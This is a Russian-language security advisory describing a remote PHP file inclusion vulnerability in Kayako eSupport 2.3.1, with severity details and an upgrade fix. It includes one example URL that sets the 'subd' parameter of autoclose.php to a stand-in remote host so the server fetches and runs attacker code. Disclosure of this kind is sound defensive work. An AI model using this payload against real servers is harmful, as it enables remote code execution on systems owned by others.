PHP-инклюдинг в Kayako eSupport

Дата публикации:
07.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
9282
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Kayako eSupport 2.x
Уязвимые версии: Kayako eSupport 2.3.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "subd" в сценарии esupport/admin/autoclose.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

http://victim/esupport/admin/autoclose.php?subd=http://remotefile/?

URL производителя: www.kayako.com/?_a=products&_m=esupport.features

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability

или введите имя

CAPTCHA